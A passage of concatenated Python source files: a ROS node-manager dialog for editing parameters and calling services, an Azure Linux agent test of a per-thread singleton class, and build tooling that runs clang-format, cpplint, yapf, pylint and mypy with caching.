# empty string. We want an empty dictionary instead
# for our representation of empty.
if value is None:
value = []
except ruamel.yaml.MarkedYAMLError, e:
MessageBox.warning(self, self.tr("Warning"), "yaml error: %s" % utf8(e))
else:
value = params['value']
self._on_param_values(self.masteruri, 1, '', {roslib.names.ns_join(params['namespace'], params['name']): (1, '', value)}, new_param=True)
else:
MessageBox.warning(self, self.tr("Warning"), 'Empty name is not valid!')
except ValueError, e:
print(traceback.format_exc(3))
MessageBox.warning(self, self.tr("Warning"), utf8(e))
def _on_param_list(self, masteruri, code, msg, params):
'''
:param str masteruri: The URI of the ROS parameter server
:param int code: The return code of the request. If not 1, the message is set and the list can be ignored.
:param str msg: The message of the result.
:param [str] params: The list the parameter names.
'''
if code == 1:
params.sort()
self.parameterHandler.requestParameterValues(masteruri, params)
else:
self.setText(msg)
def _on_param_values(self, masteruri, code, msg, params, new_param=False):
'''
:param str masteruri: The URI of the ROS parameter server
:param int code: The return code of the request. If not 1, the message is set and the list can be ignored.
:param str msg: The message of the result.
:param params: The dictionary the parameter names and request result.
:type params: dict(paramName : (code, statusMessage, parameterValue))
'''
if code == 1:
dia_params = dict()
for p, (code_n, _, val) in params.items(): # _:=msg_n
if code_n != 1:
val = ''
type_str = 'string'
value = utf8(val)
if isinstance(val, bool):
type_str = 'bool'
elif isinstance(val, int):
type_str = 'int'
elif isinstance(val, float):
type_str = 'float'
elif isinstance(val, list) or isinstance(val, dict):
# handle representation of `rosparam`
type_str = 'list'
value = ''
for v in val:
if len(value) > 0:
value = value + ', '
value = value + utf8(v)
elif isinstance(val, Binary):
type_str = 'binary'
param = p.replace(self.ns, '')
param = param.strip(roslib.names.SEP)
names_sep = param.split(roslib.names.SEP)
param_name = names_sep.pop()
if names_sep:
group = dia_params
for n in names_sep:
group_name = n
if group_name in group:
group = group[group_name]
else:
tmp_dict = dict()
group[group_name] = tmp_dict
group = tmp_dict
group[param_name] = {':type': type_str, ':value': value}
else:
dia_params[param_name] = {':type': type_str, ':value': value}
try:
self.content.createFieldFromValue(dia_params, clear_origin_value=new_param)
self.setInfoActive(False)
except Exception as e:
print(traceback.format_exc(3))
MessageBox.warning(self, self.tr("Warning"), utf8(e))
else:
self.setText(msg)
def _on_delivered_values(self, masteruri, code, msg, params):
'''
:param str masteruri: The URI of the ROS parameter server
:param int code: The return code of the request. If not 1, the message is set and the list can be ignored.
:param str msg: The message of the result.
:param params: The dictionary the parameter names and request result.
:type params: dict(paramName : (code, statusMessage, parameterValue))
'''
self.is_delivered = True
errmsg = ''
if code == 1:
for _, (code_n, msg, _) in params.items(): # _:=param, val
if code_n != 1:
errmsg = '\n'.join([errmsg, msg])
else:
errmsg = msg if msg else 'Unknown error on set parameter'
if errmsg:
print(traceback.format_exc(2))
MessageBox.warning(self, self.tr("Warning"), utf8(errmsg))
self.is_delivered = False
self.is_send = False
self.setInfoActive(False)
if self.is_delivered:
self.close()
class ServiceDialog(ParameterDialog):
'''
Adds a support for calling a service to the L{ParameterDialog}. The needed
input fields are created from the service request message type. The service
call is executed in a thread to avoid blocking GUI.
'''
service_resp_signal = Signal(str, str)
def __init__(self, service, parent=None):
'''
:param service: Service to call.
:type service: U{fkie_master_discovery.ServiceInfo<http://docs.ros.org/kinetic/api/fkie_master_discovery/html/modules.html#fkie_master_discovery.master_info.ServiceInfo>}
'''
self.service = service
slots = service.get_service_class(True)._request_class.__slots__
types = service.get_service_class()._request_class._slot_types
ParameterDialog.__init__(self, self._params_from_slots(slots, types), buttons=QDialogButtonBox.Close, parent=parent, store_geometry='service_call_dialog')
self.setWindowTitle('Call %s' % service.name)
self.service_resp_signal.connect(self._handle_resp)
# self.resize(450, 300)
if not slots:
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService)
thread.setDaemon(True)
thread.start()
else:
self.call_service_button = QPushButton(self.tr("&Call"))
self.call_service_button.clicked.connect(self._on_call_service)
self.buttonBox.addButton(self.call_service_button, QDialogButtonBox.ActionRole)
self.hide_button = QPushButton(self.tr("&Hide/Show output"))
self.hide_button.clicked.connect(self._on_hide_output)
self.buttonBox.addButton(self.hide_button, QDialogButtonBox.ActionRole)
self.hide_button.setVisible(False)
self.showLoadSaveButtons()
def _on_hide_output(self):
self.setInfoActive(not self.info_field.isVisible())
def _on_call_service(self):
try:
self.hide_button.setVisible(True)
params = self.getKeywords()
self.setText(''.join(['Wait for response ...']))
thread = threading.Thread(target=self._callService, args=((params,)))
thread.setDaemon(True)
thread.start()
except Exception, e:
rospy.logwarn("Error while reading parameter for %s service: %s", utf8(self.service.name), utf8(e))
self.setText(''.join(['Error while reading parameter:\n', utf8(e)]))
def _callService(self, params={}):
req = utf8(params) if params else ''
try:
req, resp = nm.starter().callService(self.service.uri, self.service.name, self.service.get_service_class(), [params])
self.service_resp_signal.emit(utf8(repr(req)), utf8(repr(resp)))
except Exception, e:
print(traceback.format_exc(2))
rospy.logwarn("Error while call service '%s': %s", utf8(self.service.name), utf8(e))
self.service_resp_signal.emit(utf8(repr(req)), utf8(e))
@classmethod
def _params_from_slots(cls, slots, types, values={}):
result = dict()
for slot, msg_type in zip(slots, types):
base_type, is_array, _array_length = roslib.msgs.parse_type(msg_type)
if base_type in roslib.msgs.PRIMITIVE_TYPES or base_type in ['time', 'duration']:
default_value = 'now' if base_type in ['time', 'duration'] else ''
if slot in values and values[slot]:
default_value = values[slot]
result[slot] = {':type': msg_type, ':value': default_value}
else:
try:
list_msg_class = roslib.message.get_message_class(base_type)
if is_array and slot in values:
subresult = []
for slot_value in values[slot]:
subvalue = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, slot_value if slot in values and slot_value else {})
subresult.append(subvalue)
result[slot] = {':value': subresult, ':type': msg_type}
else:
subresult = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, values[slot] if slot in values and values[slot] else {})
if is_array:
result[slot] = {':value': subresult, ':type': msg_type}
else:
subresult[':type'] = msg_type
result[slot] = subresult
except ValueError, e:
print(traceback.format_exc())
rospy.logwarn("Error while parse message type '%s': %s", utf8(msg_type), utf8(e))
return result
def _handle_resp(self, req, resp):
self.setWindowTitle(''.join(['Request / Response of ', self.service.name]))
self.setText('\n'.join([utf8(req), '---', utf8(resp)]))
|
test_singletonperthread.py
|
import uuid
from multiprocessing import Queue
from threading import Thread, currentThread
from azurelinuxagent.common.singletonperthread import SingletonPerThread
from tests.tools import AgentTestCase, clear_singleton_instances
class TestClassToTestSingletonPerThread(SingletonPerThread):
"""
Since these tests deal with testing in a multithreaded environment,
we employ the use of multiprocessing.Queue() to ensure that the data is consistent.
This test class uses a uuid to identify an object instead of directly using object reference because
Queue.get() returns a different object reference than what is put in it even though the object is same
(which is verified using uuid in this test class)
Eg:
obj1 = WireClient("obj1")
obj1
<__main__.WireClient object at 0x7f5e78476198>
q = Queue()
q.put(obj1)
test1 = q.get()
test1
<__main__.WireClient object at 0x7f5e78430630>
test1.endpoint == obj1.endpoint
True
"""
def __init__(self):
# Set the name of the object to the current thread name
self.name = currentThread().getName()
# Unique identifier for a class object
self.uuid = str(uuid.uuid4())
class TestSingletonPerThread(AgentTestCase):
THREAD_NAME_1 = 'thread-1'
THREAD_NAME_2 = 'thread-2'
def setUp(self):
super(TestSingletonPerThread, self).setUp()
# In a multi-threaded environment, exceptions thrown in the child thread will not be propagated to the parent
# thread. In order to achieve that, adding all exceptions to a Queue and then checking that in parent thread.
self.errors = Queue()
clear_singleton_instances(TestClassToTestSingletonPerThread)
def _setup_multithread_and_execute(self, func1, args1, func2, args2, t1_name=None, t2_name=None):
t1 = Thread(target=func1, args=args1)
t2 = Thread(target=func2, args=args2)
t1.setName(t1_name if t1_name else self.THREAD_NAME_1)
t2.setName(t2_name if t2_name else self.THREAD_NAME_2)
t1.start()
t2.start()
t1.join()
t2.join()
errs = []
while not self.errors.empty():
errs.append(self.errors.get())
if len(errs) > 0:
raise Exception("Errors: %s" % ' , '.join(errs))
@staticmethod
def _get_test_class_instance(q, err):
try:
obj = TestClassToTestSingletonPerThread()
q.put(obj)
except Exception as e:
err.put(str(e))
def _parse_instances_and_return_thread_objects(self, instances, t1_name=None, t2_name=None):
obj1, obj2 = instances.get(), instances.get()
def check_obj(name):
if obj1.name == name:
return obj1
elif obj2.name == name:
return obj2
else:
return None
t1_object = check_obj(t1_name if t1_name else self.THREAD_NAME_1)
t2_object = check_obj(t2_name if t2_name else self.THREAD_NAME_2)
return t1_object, t2_object
def test_it_should_have_only_one_instance_for_same_thread(self):
obj1 = TestClassToTestSingletonPerThread()
obj2 = TestClassToTestSingletonPerThread()
self.assertEqual(obj1.uuid, obj2.uuid)
def test_it_should_have_multiple_instances_for_multiple_threads(self):
instances = Queue()
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(instances, self.errors),
func2=self._get_test_class_instance,
args2=(instances, self.errors))
self.assertEqual(2, instances.qsize()) # Assert that there are 2 objects in the queue
obj1, obj2 = instances.get(), instances.get()
self.assertNotEqual(obj1.uuid, obj2.uuid)
def test_it_should_return_existing_instance_for_new_thread_with_same_name(self):
instances = Queue()
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(instances, self.errors),
func2=self._get_test_class_instance,
args2=(instances, self.errors))
t1_obj, t2_obj = self._parse_instances_and_return_thread_objects(instances)
new_instances = Queue()
# The 2nd call is to get new objects with the same thread name to verify if the objects are same
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(new_instances, self.errors),
func2=self._get_test_class_instance,
args2=(new_instances, self.errors))
new_t1_obj, new_t2_obj = self._parse_instances_and_return_thread_objects(new_instances)
self.assertEqual(t1_obj.name, new_t1_obj.name)
self.assertEqual(t1_obj.uuid, new_t1_obj.uuid)
self.assertEqual(t2_obj.name, new_t2_obj.name)
self.assertEqual(t2_obj.uuid, new_t2_obj.uuid)
def test_singleton_object_should_match_thread_name(self):
instances = Queue()
t1_name = str(uuid.uuid4())
t2_name = str(uuid.uuid4())
test_class_obj_name = lambda t_name: "%s__%s" % (TestClassToTestSingletonPerThread.__name__, t_name)
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(instances, self.errors),
func2=self._get_test_class_instance,
args2=(instances, self.errors),
t1_name=t1_name,
t2_name=t2_name)
singleton_instances = TestClassToTestSingletonPerThread._instances # pylint: disable=no-member
# Assert instance names are consistent with the thread names
self.assertIn(test_class_obj_name(t1_name), singleton_instances)
self.assertIn(test_class_obj_name(t2_name), singleton_instances)
# Assert that the objects match their respective threads
# This function matches objects with their thread names and returns the respective object or None if not found
t1_obj, t2_obj = self._parse_instances_and_return_thread_objects(instances, t1_name, t2_name)
# Ensure that objects for both the threads were found
self.assertIsNotNone(t1_obj)
self.assertIsNotNone(t2_obj)
# Ensure that the objects match with their respective thread objects
self.assertEqual(singleton_instances[test_class_obj_name(t1_name)].uuid, t1_obj.uuid)
self.assertEqual(singleton_instances[test_class_obj_name(t2_name)].uuid, t2_obj.uuid)
|
code.py
|
# Copyright (c) 2011-2020 Eric Froemling
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
"""Functionality for formatting, linting, etc. code."""
from __future__ import annotations
import os
import subprocess
import sys
from pathlib import Path
from typing import TYPE_CHECKING
from efrotools.filecache import FileCache
if TYPE_CHECKING:
from typing import Set, List, Dict, Any, Union, Optional
def formatcode(projroot: Path, full: bool) -> None:
"""Run clang-format on all of our source code (multithreaded)."""
import time
import concurrent.futures
from multiprocessing import cpu_count
from efrotools import get_files_hash
os.chdir(projroot)
cachepath = Path(projroot, 'config/.cache-formatcode')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
cfconfig = Path(projroot, '.clang-format')
filenames = get_code_filenames(projroot)
confighash = get_files_hash([cfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> Dict[str, Any]:
start_time = time.time()
# Note: seems os.system does not unlock the gil;
# make sure to use subprocess.
result = subprocess.call(['clang-format', '-i', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
return {'f': filename, 't': duration}
with concurrent.futures.ThreadPoolExecutor(
max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} code files.',
flush=True)
def cpplint(projroot: Path, full: bool) -> None:
"""Run lint-checking on all code deemed lint-able."""
# pylint: disable=too-many-locals
import tempfile
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import getconfig
from efro.terminal import Clr
from efro.error import CleanError
os.chdir(projroot)
filenames = get_code_filenames(projroot)
for fpath in filenames:
if ' ' in fpath:
raise Exception(f'Found space in path {fpath}; unexpected.')
# Check the config for a list of ones to ignore.
code_blacklist: List[str] = getconfig(projroot).get(
'cpplint_blacklist', [])
# Just pretend blacklisted ones don't exist.
filenames = [f for f in filenames if f not in code_blacklist]
filenames = [f for f in filenames if not f.endswith('.mm')]
cachepath = Path(projroot, 'config/.cache-lintcode')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, '')
dirtyfiles = cache.get_dirty_files()
if dirtyfiles:
print(f'{Clr.BLU}CppLint checking'
f' {len(dirtyfiles)} file(s)...{Clr.RST}')
# We want to do a few custom modifications to the cpplint module...
try:
import cpplint as cpplintmodule
except Exception:
raise CleanError('Unable to import cpplint')
with open(cpplintmodule.__file__) as infile:
codelines = infile.read().splitlines()
cheadersline = codelines.index('_C_HEADERS = frozenset([')
# Extra headers we consider as valid C system headers.
c_headers = [
'malloc.h', 'tchar.h', 'jni.h', 'android/log.h', 'EGL/egl.h',
'libgen.h', 'linux/netlink.h', 'linux/rtnetlink.h', 'android/bitmap.h',
'android/log.h', 'uuid/uuid.h', 'cxxabi.h', 'direct.h', 'shellapi.h',
'rpc.h', 'io.h'
]
codelines.insert(cheadersline + 1, ''.join(f"'{h}'," for h in c_headers))
# Skip unapproved C++ headers check (it flags <mutex>, <thread>, etc.)
headercheckline = codelines.index(
" if include and include.group(1) in ('cfenv',")
codelines[headercheckline] = (
" if False and include and include.group(1) in ('cfenv',")
# Don't complain about unknown NOLINT categories.
# (we use them for clang-tidy)
unknownlintline = codelines.index(
' elif category not in _LEGACY_ERROR_CATEGORIES:')
codelines[unknownlintline] = ' elif False:'
def lint_file(filename: str) -> None:
result = subprocess.call(
['python3.7', '-m', 'cpplint', '--root=src', filename], env=env)
if result != 0:
raise CleanError(
f'{Clr.RED}Cpplint failed for {filename}.{Clr.RST}')
with tempfile.TemporaryDirectory() as tmpdir:
# Write our replacement module, make it discoverable, then run.
with open(tmpdir + '/cpplint.py', 'w') as outfile:
outfile.write('\n'.join(codelines))
env = os.environ.copy()
env['PYTHONPATH'] = tmpdir
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(lint_file, dirtyfiles))
if dirtyfiles:
cache.mark_clean(filenames)
cache.write()
print(
f'{Clr.GRN}CppLint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
def get_code_filenames(projroot: Path) -> List[str]:
"""Return the list of files to lint-check or auto-formatting."""
from efrotools import getconfig
exts = ('.h', '.c', '.cc', '.cpp', '.cxx', '.m', '.mm')
places = getconfig(projroot).get('code_source_dirs', None)
if places is None:
raise RuntimeError('code_source_dirs not declared in config')
codefilenames = []
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
if any(fname.endswith(ext) for ext in exts):
codefilenames.append(os.path.join(root, fname))
codefilenames.sort()
return codefilenames
def formatscripts(projroot: Path, full: bool) -> None:
"""Runs yapf on all our scripts (multithreaded)."""
import time
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import get_files_hash
os.chdir(projroot)
cachepath = Path(projroot, 'config/.cache-formatscripts')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
yapfconfig = Path(projroot, '.style.yapf')
filenames = get_script_filenames(projroot)
confighash = get_files_hash([yapfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> None:
start_time = time.time()
result = subprocess.call(
['python3.7', '-m', 'yapf', '--in-place', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Convert the futures to a list to propagate any errors even
# though there are no return values we use.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} script files.',
flush=True)
def _should_include_script(fnamefull: str) -> bool:
fname = os.path.basename(fnamefull)
if fname.endswith('.py'):
return True
# Look for 'binary' scripts with no extensions too.
if not fname.startswith('.') and '.' not in fname:
try:
with open(fnamefull) as infile:
line = infile.readline()
if '/usr/bin/env python' in line or '/usr/bin/python' in line:
return True
except UnicodeDecodeError:
# Actual binary files will probably kick back this error.
pass
return False
def get_script_filenames(projroot: Path) -> List[str]:
"""Return the Python filenames to lint-check or auto-format."""
from efrotools import getconfig
filenames = set()
places = getconfig(projroot).get('python_source_dirs', None)
if places is None:
raise RuntimeError('python_source_dirs not declared in config')
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
fnamefull = os.path.join(root, fname)
# Skip symlinks (we conceivably operate on the original too)
if os.path.islink(fnamefull):
continue
if _should_include_script(fnamefull):
filenames.add(fnamefull)
return sorted(list(f for f in filenames if 'flycheck_' not in f))
def runpylint(projroot: Path, filenames: List[str]) -> None:
"""Run Pylint explicitly on files."""
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
# Technically we could just run pylint standalone via command line here,
# but let's go ahead and run it inline so we're consistent with our cached
# full-project version.
_run_pylint(projroot,
pylintrc,
cache=None,
dirtyfiles=filenames,
allfiles=None)
def pylint(projroot: Path, full: bool, fast: bool) -> None:
"""Run Pylint on all scripts in our project (with smart dep tracking)."""
from efrotools import get_files_hash
from efro.terminal import Clr
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
filenames = get_script_filenames(projroot)
if any(' ' in name for name in filenames):
raise Exception('found space in path; unexpected')
script_blacklist: List[str] = []
filenames = [f for f in filenames if f not in script_blacklist]
cachebasename = '.cache-lintscriptsfast' if fast else '.cache-lintscripts'
cachepath = Path(projroot, 'config', cachebasename)
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, get_files_hash([pylintrc]))
# Do a recursive dependency check and mark all files who are
# either dirty or have a dependency that is dirty.
filestates: Dict[str, bool] = {}
for fname in filenames:
_dirty_dep_check(fname, filestates, cache, fast, 0)
dirtyfiles = [k for k, v in filestates.items() if v]
# Let's sort by modification time, so ones we're actively trying
# to fix get linted first and we see remaining errors faster.
dirtyfiles.sort(reverse=True, key=lambda f: os.stat(f).st_mtime)
if dirtyfiles:
print(
f'{Clr.BLU}Pylint checking {len(dirtyfiles)} file(s)...{Clr.RST}',
flush=True)
try:
_run_pylint(projroot, pylintrc, cache, dirtyfiles, filenames)
finally:
# No matter what happens, we still want to
# update our disk cache (since some lints may have passed).
cache.write()
print(f'{Clr.GRN}Pylint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
cache.write()
def _dirty_dep_check(fname: str, filestates: Dict[str, bool], cache: FileCache,
fast: bool, recursion: int) -> bool:
"""Recursively check a file's deps and return whether it is dirty."""
# pylint: disable=too-many-branches
if not fast:
# Check for existing dirty state (only applies in non-fast where
# we recurse infinitely).
curstate = filestates.get(fname)
if curstate is not None:
return curstate
# Ok; there's no current state for this file.
# First lets immediately mark it as clean so if a dependency of ours
# queries it we won't loop infinitely. (If we're actually dirty that
# will be reflected properly once we're done).
if not fast:
filestates[fname] = False
# If this dependency has disappeared, consider that dirty.
if fname not in cache.entries:
dirty = True
else:
cacheentry = cache.entries[fname]
# See if we ourself are dirty
if 'hash' not in cacheentry:
dirty = True
else:
# Ok we're clean; now check our dependencies..
dirty = False
# Only increment recursion in fast mode, and
# skip dependencies if we're pass the recursion limit.
recursion2 = recursion
if fast:
# Our one exception is top level ba which basically aggregates.
if not fname.endswith('/ba/__init__.py'):
recursion2 += 1
if recursion2 <= 1:
deps = cacheentry.get('deps', [])
for dep in deps:
# If we have a dep that no longer exists, WE are dirty.
if not os.path.exists(dep):
dirty = True
break
if _dirty_dep_check(dep, filestates, cache, fast,
recursion2):
dirty = True
break
# Cache and return our dirty state..
# Note: for fast mode we limit to recursion==0 so we only write when
# the file itself is being directly visited.
if recursion == 0:
filestates[fname] = dirty
return dirty
def _run_pylint(projroot: Path, pylintrc: Union[Path, str],
cache: Optional[FileCache], dirtyfiles: List[str],
allfiles: Optional[List[str]]) -> Dict[str, Any]:
import time
from pylint import lint
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
args = ['--rcfile', str(pylintrc), '--output-format=colorized']
args += dirtyfiles
name = f'{len(dirtyfiles)} file(s)'
run = lint.Run(args, do_exit=False)
if cache is not None:
assert allfiles is not None
result = _apply_pylint_run_to_cache(projroot, run, dirtyfiles,
allfiles, cache)
if result != 0:
raise CleanError(f'Pylint failed for {result} file(s).')
# Sanity check: when the linter fails we should always be failing too.
# If not, it means we're probably missing something and incorrectly
# marking a failed file as clean.
if run.linter.msg_status != 0 and result == 0:
raise RuntimeError('Pylint linter returned non-zero result'
' but we did not; this is probably a bug.')
else:
if run.linter.msg_status != 0:
raise CleanError('Pylint failed.')
duration = time.time() - start_time
print(f'{Clr.GRN}Pylint passed for {name}'
f' in {duration:.1f} seconds.{Clr.RST}')
sys.stdout.flush()
return {'f': dirtyfiles, 't': duration}
def _apply_pylint_run_to_cache(projroot: Path, run: Any, dirtyfiles: List[str],
allfiles: List[str], cache: FileCache) -> int:
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
from astroid import modutils
from efrotools import getconfig
from efro.error import CleanError
# First off, build a map of dirtyfiles to module names
# (and the corresponding reverse map).
paths_to_names: Dict[str, str] = {}
names_to_paths: Dict[str, str] = {}
for fname in allfiles:
try:
mpath = modutils.modpath_from_file(fname)
mpath = _filter_module_name('.'.join(mpath))
paths_to_names[fname] = mpath
except ImportError:
# This probably means its a tool or something not in our
# standard path. In this case just use its base name.
# (seems to be what pylint does)
dummyname = os.path.splitext(os.path.basename(fname))[0]
paths_to_names[fname] = dummyname
for key, val in paths_to_names.items():
names_to_paths[val] = key
# If there's any cyclic-import errors, just mark all deps as dirty;
# don't want to add the logic to figure out which ones the cycles cover
# since they all seems to appear as errors for the last file in the list.
cycles: int = run.linter.stats.get('by_msg', {}).get('cyclic-import', 0)
have_dep_cycles: bool = cycles > 0
if have_dep_cycles:
print(f'Found {cycles} cycle-errors; keeping all dirty files dirty.')
# Update dependencies for what we just ran.
# A run leaves us with a map of modules to a list of the modules that
# imports them. We want the opposite though: for each of our modules
# we want a list of the modules it imports.
reversedeps = {}
# Make sure these are all proper module names; no foo.bar.__init__ stuff.
for key, val in run.linter.stats['dependencies'].items():
sval = [_filter_module_name(m) for m in val]
reversedeps[_filter_module_name(key)] = sval
deps: Dict[str, Set[str]] = {}
untracked_deps = set()
for mname, mallimportedby in reversedeps.items():
for mimportedby in mallimportedby:
if mname in names_to_paths:
deps.setdefault(mimportedby, set()).add(mname)
else:
untracked_deps.add(mname)
ignored_untracked_deps: List[str] = getconfig(projroot).get(
'pylint_ignored_untracked_deps', [])
# Add a few that this package itself triggers.
ignored_untracked_deps += ['pylint.lint', 'astroid.modutils', 'astroid']
# Ignore some specific untracked deps; complain about any others.
untracked_deps = set(dep for dep in untracked_deps
if dep not in ignored_untracked_deps)
if untracked_deps:
raise CleanError(
f'Pylint found untracked dependencies: {untracked_deps}.'
' If these are external to your project, add them to'
' "pylint_ignored_untracked_deps" in the project config.')
# Finally add the dependency lists to our entries (operate on
# everything in the run; it may not be mentioned in deps).
no_deps_modules = set()
for fname in dirtyfiles:
fmod = paths_to_names[fname]
if fmod not in deps:
# Since this code is a bit flaky, lets always announce when we
# come up empty and keep a whitelist of expected values to ignore.
no_deps_modules.add(fmod)
depsval: List[str] = []
else:
# Our deps here are module names; store paths.
depsval = [names_to_paths[dep] for dep in deps[fmod]]
cache.entries[fname]['deps'] = depsval
# Let's print a list of modules with no detected deps so we can make sure
# this is behaving.
if no_deps_modules:
if bool(False):
print('NOTE: no dependencies found for:',
', '.join(no_deps_modules))
# Ok, now go through all dirtyfiles involved in this run.
# Mark them as either errored or clean depending on whether there's
# error info for them in the run stats.
# Once again need to convert any foo.bar.__init__ to foo.bar.
stats_by_module: Dict[str, Any] = {
_filter_module_name(key): val
for key, val in run.linter.stats['by_module'].items()
}
errcount = 0
for fname in dirtyfiles:
mname2 = paths_to_names.get(fname)
if mname2 is None:
raise Exception('unable to get module name for "' + fname + '"')
counts = stats_by_module.get(mname2)
# 'statement' count seems to be new and always non-zero; ignore it
if counts is not None:
counts = {c: v for c, v in counts.items() if c != 'statement'}
if (counts is not None and any(counts.values())) or have_dep_cycles:
# print('GOT FAIL FOR', fname, counts)
if 'hash' in cache.entries[fname]:
del cache.entries[fname]['hash']
errcount += 1
else:
# print('MARKING FILE CLEAN', mname2, fname)
cache.entries[fname]['hash'] = (cache.curhashes[fname])
return errcount
def _filter_module_name(mpath: str) -> str:
"""Filter weird module paths such as 'foo.bar.__init__' to 'foo.bar'."""
# Seems Pylint returns module paths with __init__ on the end in some cases
# and not in others. Could dig into it, but for now just filtering them
# out...
return mpath[:-9] if mpath.endswith('.__init__') else mpath
def runmypy(projroot: Path,
filenames: List[str],
full: bool = False,
check: bool = True) -> None:
"""Run MyPy on provided filenames."""
from efrotools import PYTHON_BIN
args = [
PYTHON_BIN, '-m', 'mypy', '--pretty', '--no-error-summary',
'--config-file',
str(Path(projroot, '.mypy.ini'))
] + filenames
if full:
args.insert(args.index('mypy') + 1, '--no-incremental')
subprocess.run(args, check=check)
def mypy(projroot: Path, full: bool) -> None:
"""Type check all of our scripts using mypy."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
desc = '(full)' if full else '(incremental)'
print(f'{Clr.BLU}Running Mypy {desc}...{Clr.RST}', flush=True)
starttime = time.time()
try:
runmypy(projroot, filenames, full)
except Exception:
raise CleanError('Mypy failed.')
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def dmypy(projroot: Path) -> None:
"""Type check all of our scripts using mypy in daemon mode."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
# Special case; explicitly kill the daemon.
if '-stop' in sys.argv:
subprocess.run(['dmypy', 'stop'], check=False)
return
print('Running Mypy (daemon)...', flush=True)
starttime = time.time()
try:
args = [
'dmypy', 'run', '--timeout', '3600', '--', '--config-file',
'.mypy.ini', '--follow-imports=error', '--pretty'
] + filenames
subprocess.run(args, check=True)
except Exception:
raise CleanError('Mypy daemon: fail.')
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy daemon passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _parse_idea_results(path: Path) -> int:
"""Print errors found in an idea inspection xml file.
Returns the number of errors found.
"""
import xml.etree.ElementTree as Et
error_count = 0
root = Et.parse(str(path)).getroot()
for child in root:
line: Optional[str] = None
description: Optional[str] = None
fname: Optional[str] = None
if child.tag == 'problem':
is_error = True
for pchild in child:
if pchild.tag == 'problem_class':
# We still report typos but we don't fail the
# check due to them (that just gets tedious).
if pchild.text == 'Typo':
is_error = False
if pchild.tag == 'line':
line = pchild.text
if pchild.tag == 'description':
description = pchild.text
if pchild.tag == 'file':
fname = pchild.text
if isinstance(fname, str):
fname = fname.replace('file://$PROJECT_DIR$/', '')
print(f'{fname}:{line}: {description}')
if is_error:
error_count += 1
return error_count
def _run_idea_inspections(projroot: Path,
scripts: List[str],
displayname: str,
inspect: Path,
verbose: bool,
inspectdir: Path = None) -> None:
"""Actually run idea inspections.
Throw an Exception if anything is found or goes wrong.
"""
# pylint: disable=too-many-locals
import tempfile
import time
import datetime
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
print(
f'{Clr.BLU}{displayname} checking'
f' {len(scripts)} file(s)...{Clr.RST}',
flush=True)
tmpdir = tempfile.TemporaryDirectory()
